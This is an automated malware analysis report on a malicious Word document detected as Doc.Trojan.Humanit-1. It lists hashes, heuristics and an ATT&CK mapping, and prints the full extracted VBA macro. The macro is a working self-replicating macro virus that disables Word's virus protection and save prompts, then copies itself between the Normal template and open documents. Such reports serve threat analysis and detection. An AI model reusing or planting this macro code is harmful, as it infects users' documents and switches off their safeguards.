Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b0627b65fc4b8fc…

MALICIOUS

Office (OLE)

33.5 KB Created: 2000-08-23 23:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: bdfdc501be2cffe91103ceb9b580d53b SHA-1: 150b0b703c1358eb0164d7ebf7822234e293f256 SHA-256: 6b0627b65fc4b8fc5d34d05bc3ae6f9392744d973c07ee63b7aa7665c4683086
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The macros appear to be designed to copy themselves between the Normal template and the active document, a technique often used for persistence or to complicate analysis. The ClamAV detection 'Doc.Trojan.Humanit-1' and the heuristic firing for VBA macros strongly indicate malicious intent, though the specific payload or ultimate goal is not directly revealed by the provided evidence.

Heuristics 2

  • ClamAV: Doc.Trojan.Humanit-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Humanit-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 953 bytes
SHA-256: c48caf3ef041a6123d823118de07c59a0466c2d6b8f604fdcb22ebcf0d0832b5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Rem Humanitvir
cisti:
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Set n = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set d = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If n.Lines(4, 1) <> "cisti:" Then
Do Until n.CountOfLines = 0
n.DeleteLines 1, 1
Loop
For a = 1 To d.CountOfLines
n.InsertLines a, d.Lines(a, 1)
Next a
End If
If d.Lines(4, 1) <> "cisti:" Then
Do Until d.CountOfLines = 0
d.DeleteLines 1, 1
Loop
For a = 1 To n.CountOfLines
d.InsertLines a, n.Lines(a, 1)
Next a
End If
End Sub